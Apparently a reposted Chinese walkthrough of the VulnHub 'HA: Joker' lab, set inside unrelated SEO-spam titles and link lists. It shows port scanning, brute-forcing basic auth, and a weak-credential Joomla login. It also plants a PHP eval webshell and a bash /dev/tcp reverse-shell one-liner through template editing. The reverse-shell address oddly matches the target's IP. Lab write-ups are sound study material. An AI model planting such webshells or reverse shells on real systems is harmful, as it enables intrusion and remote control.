当前位置: 首页 > wzjs >正文

网站开发公司的推广费用品牌营销成功案例

网站开发公司的推广费用,品牌营销成功案例,品牌推广网站怎么做,盐地网站建设公司靶场下载链接 https://download.vulnhub.com/ha/joker.zip 将kali和joker,桥接模式 获取靶场ip arp-scan -l 使用nmap扫描 nmap -sS -sV -p- 访问80端口什么都没有发现 访问8080端口发现 用drib进行目录扫描 dirb "http://192.168.117.157" -X .txt,php,json,html…

靶场下载链接

 https://download.vulnhub.com/ha/joker.zip

 将kali和joker,桥接模式

获取靶场ip

arp-scan -l

使用nmap扫描

nmap -sS -sV -p- 

 访问80端口什么都没有发现

访问8080端口发现

用drib进行目录扫描 

dirb "http://192.168.117.157" -X .txt,php,json,html

访问secret.txt发现

 登录

使用登录,进行抓包

Authorization:后面的是账号密码的base64形式

发送到攻击器 

打开kali自带字典,复制字典一部分,整个复制了最好

爆破时会用到

cd /usr/share/wordlists

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz 

cat rockyou.txt

新建一个a.txt将字典复制的放入 

爆破设置

2的时候从文件加载选择a.txt 

 

点击攻击后得到密码 

解码base64

成功登录 

 账号密码弱口令登录,尝试用joomla

点击Site Administrator

因为刚才的弱口令登录成功,所以这个的账号密码都是joomla

 进去后点击Templates

 木马

 选择一个文件编辑

 创建一个新文件编辑,写入一句话木马

 点击左上角保存

<?php @eval($_POST["cmd"]);?>

 蚁剑连接成功

反弹shell

再建立一个a.php

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.117.157/6666 0>&1'");?>

使用kali开启对6666端口的监听 

 

 访问http://192.168.117.157:8080/templates/beez3/html/a.php

 kali收到监听消息,反弹shell结束

http://www.dtcms.com/wzjs/325833.html

相关文章:

  • 网站服务器数据库旅游网站网页设计
  • 专业做书画推广的网站seo还有哪些方面的优化
  • 幼儿园网站建设策划方案如何做好市场推广
  • 北控水务建设发展有限公司网站360收录提交入口
  • 浪起网站建设鱼头seo软件
  • 成都建网站多少钱最好用的磁力搜索器
  • 成都网站优化方案北京专业网站优化
  • 盐城市滨海县建设局网站百度热搜榜怎么打开
  • _网站建设网站百度题库
  • 拼多多网站首页seo顾问收费
  • 建设网站建设哪家便宜如何免费推广自己的产品
  • 设计网站的在工作中的品牌网站亚马逊关键词工具哪个最准
  • 电子产品网站建设学seo需要学什么专业
  • bootstrap模板网信息流优化师没经验可以做吗
  • 创意集团网站建设谷歌优化培训
  • 做公司网站多钱搜索关键词排名优化技术
  • 做网站和管理系统在线建站平台免费建网站
  • 学企业网站开发如何做线上营销
  • 公司做网站推广要注意什么电商运营培训班
  • 关于企业网站建设的请示企业软文
  • 学校多语言网站建设站长工具收录查询
  • 网站设计与开发培训怎样精准搜索关键词
  • 自己做的网站怎么在百度搜索到seo外链发布技巧
  • 响应式网站制作价格爱站网站长seo综合查询
  • 头像在线制作网站百度统计官网
  • 公司销售网站怎么做问卷调查网站
  • 做搬家网站推广在那好二级不死域名购买
  • 医院网站运营方案app推广接单
  • 舟山网站建设优化长沙专业网络推广公司
  • 房产网站代运营免费友链互换